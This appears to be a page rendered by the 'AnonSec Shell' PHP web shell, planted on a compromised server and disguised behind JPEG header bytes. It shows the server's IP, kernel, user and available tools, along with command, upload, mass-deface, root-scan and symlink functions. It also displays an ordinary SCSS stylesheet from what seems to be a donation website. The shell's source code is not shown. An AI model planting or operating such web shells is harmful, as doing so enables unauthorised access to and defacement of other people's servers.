JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 104.21.79.64  /  Your IP : 104.23.243.116   [ Reverse IP ]
Web Server : nginx/1.18.0
System : Linux ip-172-31-29-104 5.15.0-1075-aws #82~20.04.1-Ubuntu SMP Thu Dec 19 05:24:09 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/app/karina/prd/assets/scss/var/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/app/karina/prd/assets/scss/var/_responsive.scss
@media screen and (max-width: 500px) {
    html {
        //overflow-x: hidden;
        max-width: 100%;
    }
    body {
        padding-top: 0px;
        
    }
    .container,
    .container1200 {
        width: 100%;
        &:nth-child(1) {
            width: 100% !important;
        }
    }
    .content2 {
        padding-top: 90PX;
    }
    #header {
        .row.align-items-center {
            justify-content: space-between !important;
        }
        .logo {
            width: 50px;
            height: 50px;
            a {
                display: block;
                width: 100%;
                height: 100%;
            }
            img {
                width: 50px;
                height: 50px;
            }
        }
        .nav,
        .card-mari-donasi,
        .lang,
        .btn-white {
            display: none;
        }
        .header-right {
            position: absolute;
            right: 10px;
            top: -20px;
            width: 200px;
        }
        .menu-ham {
            display: block;
            width: 20px;
            position: absolute;
            right: 15px;
            top: -10px;
            span {
                display: block;
                height: 3px;
                background-color: #000;
                width: 100%;
                margin-bottom: 5px;
            }
        }
        &.grad,
        &.stay,
        &.black {
            .menu-ham {
                span {
                    background-color: #fff;
                }
            }
        }
        &.stay {
            background-color: rgba($color: #000000, $alpha: 0.7);
        }
        &.menu_open {
            background-color: #000;
            background-image: url('../img/bg_black.jpg');
            background-size: cover;
            background-position: top left;
            height: 600px;
            .sub-menu {
                z-index: 5;
            }
            .nav {
                position: fixed;
                display: block;
                width: 100%;
                padding: 0px;
                color: #fff;
                top: 70px;
                padding-top: 30px;
                padding-bottom: 30px;
                z-index: 5;
                > span {
                    display: block;
                    a {
                        font-size: 18px;
                        padding: 3px 0;
                        margin-top: 10px;
                        opacity: 0.8;
                    }
                }
                .active {
                    color: #fff !important;
                    font-weight: normal;
                    opacity: 1;
                }
            }
            .title-mobile {
                display: block;
                color:#CAA231 ;
                font-size: 14px;
                margin-left: 20px;
            }
            .btn-donasi-m {
                display: none;
            }
            .col-8.col-sm-5 {
                -webkit-box-flex: 0;
                -ms-flex: 0 0 100%;
                flex: 0 0 100%;
                max-width: 100%;
            }
            .header-right {
                position: absolute;
                top: 270px;
                right: 0;
                width: 100%;
                .btn-register {
                    margin-top: 10px;
                    display: block;
                    width: 42%;
                    float: left;
                    margin-left: 20px;
                    background-color: #fff;
                    color: red;
                }
                .btn-login {
                    margin-top: 10px;
                    display: block;
                    width: 42%;
                    float: right;
                    margin-right: 20px;
                    background-color: rgba($color: #fff, $alpha: 0.8);
                    color: #000;
                }
                .card-mari-donasi {
                    margin: 20px;
                    margin-top: 70px;
                    border: 1px solid #fff;
                }
            }
            .card-mari-donasi {
                display: block;
            }
            .menu-ham {
                top: -35px;
            }
            .menu_close {
                span {
                    &:nth-child(1) {
                        @include rotate(45deg);
                        position: relative;
                        top: 9px;
                    }
                    &:nth-child(2) {
                        @include rotate(-45deg);
                    }
                    &:last-child {
                        display: none;
                    }
                }
            }
            .btn-account {
                display: inline-block;
                margin-left: 20px;
                margin-top: 5px;
            }
            .box-status-2 {
                margin-top: 20px !important;
            }

        }
    }
    .view-mobile {
        display: block;
    }
    .home_donasi {
        &:before {
            padding-top: 160%;
        }
        .text {
            .container {
                margin-bottom: 50px;
            }
            h1 {
                font-size: 32px;
            }
            h2 {
                font-size: 28px;;
            }
            .desc {
                font-size: 13px;
            }
        }
        .btn-big {
            padding: 8px 20px;
            font-size: 14px;
        }
        .img_con {
            background-position: center;
        }
    }
    .card-1 {
        margin-bottom: 30px;
    }

    #footer {
        .box-black {
            height: 250px;
            .img {
                display: none;
            }
            .text {
                width: 80%;
                top: 30px;
                left: 10%;
                font-size: 24px;
            }
        }
        .foot2 {
            padding: 10px;
            .footer-phone {
                margin-top: 20px;
                width: 100%;
            }
        }
        .foot-3 {
            padding: 10px;
            a {
                margin: 10px 20px 10px 0;
                display: inline-block;
            }
            .sosmed {
                transform: translateY(0);
                margin: 20px 0;
                text-align: center;
            }
        }
        .container1300 {
            background-size: 300px;
        }
    }
    .title-page-left {
        .sub {
            font-size: 13px;
        }
        h1 {
            font-size: 28px;
        }
    }
    .img-cover-program:before {
        height: 10px;
        top: -10px;
    }
    .box-white-2  {
        padding: 50px 20px;
        background-position: bottom center;
        h3 {
            font-size: 22px;
        }
        .desc {
            padding: 10px;
        }
        .img {
            padding-bottom: 0;
            height: 400px;
            >div:nth-child(2) {
                img {
                    transform: translate(-80px, -80px);
                }
            }
            >div:nth-child(3) {
                img {
                    transform: translate(80px, -230px);
                }
            }
        }
    }
    .list-program {
        .container1200:nth-child(2) {
            transform: translateY(-20px);
        }
    }
    .detail-news {
        .author {
            font-size: 14px;
        }
    }
    .hero-donasi {
        &:before {
            padding-top: 200%;
        }
        .text-cover-hl {
            bottom: 150px;
            .sub {
                font-size: 14px;
            }
            h1 {
                font-size: 32px;
            }
        }
    }
    .box-content-donasi {
        margin-top: -100px;
        &:before {
            left: 10%;
            width: 80%;
        }
    }
    .box-donasi-orange {
        margin-bottom: 20px;
    }

    .card_donasi_2 {
        .img_con {
            background-position: center;
        }
        &:before {
            padding-top: 160%;
        }
        .text {
            padding: 15px !important;
        }
        &:nth-child(4),
        &:nth-child(5) {
            width: 100% !important;
            margin-left: 0 !important;
            &:before {
                padding-top: 160% !important;
            }
            .desc {
                display: block !important;
            }
        }
    }
    .section-2 {
        h2 {
            font-size: 24px !important;
        }
    }
    .card-fitur {
        margin: 40px 0;
        .icon {
            height: 80px;
        }
        h3 {
            font-size: 20px;
        }
        .img-fitur {
            &:before {
                height: 10px !important;
                top: -10px !important;
            }
            .box_img {
                &:before {
                    padding-top: 40%;
                }
            }
        }
    }
    .detail-contact {
        .form-donasi {
            padding: 20px;
            padding-bottom: 50px;
        }
    }
    .hero-donasi-detail {
        &:before {
            padding-top: 100%;
        }
        .img_con {
            background-position: center;
        }
    }
    .box-content-donasi {
        padding: 20px;
        margin-top: 0;
        .form-donasi {
            margin-top: 0;
            padding: 15px;
        }
    }
    .auth {
        
    }
    .img-auth {
        display: none;
    }
    .profile {

    }
    .form-donasi.form-edit {
        padding: 20px;
    }
    .home-tentang {
        padding: 50px 30px;
    }
    .hl-black {
        padding-bottom: 160px;
    }
    .img-tiles {
        margin-top: -240px;
        .box_img {
            border: 0px solid #fff;
            .img_con {
                border: 2px solid #fff;
            }
        }
    }
    .breadcrumb {
        margin-bottom: 0px;
    }
    .card-newsletter {
        .icon {
            &.icon2 {
                margin: 10px;
            }
        }
    }
    .card-struktur {
        .box_img {
            width: 85px;
        }
    }
    .about-fitur {
        .card-fitur {
             &:nth-child(odd),
             &:nth-child(even) {
                 .col-sm-7 {
                     order: 1;
                 }
                 .col-sm-5 {
                     order: 2;
                 }
             }
             .detail-text {
                padding: 0 10px;
                padding-bottom: 30px;
            }
        } 
     }
     #slide-donasi .nav-slide {
        display: none !important;
     }
     .box-ak {
        width: 100%;
     }
     .box-ak::before {
        width: calc(100% + 5px);
     }
     .box-account-rek {
        margin: 0px;
        padding: 20px 10px;
        h2 {
            font-size: 18px;
        }
        .box-inside {
            padding: 10px;
            h3 {
                font-size: 16px;
            }
            .box-rekening {
                font-size: 16px;
                padding: 10px 16px 10px 14px;
                .btn {
                    margin-left: 10px;
                    padding: 4px 10px;

                    img {
                        height: 20px;
                    }
                }
    
            }
        }
    }
    
}

Anon7 - 2022
AnonSec Team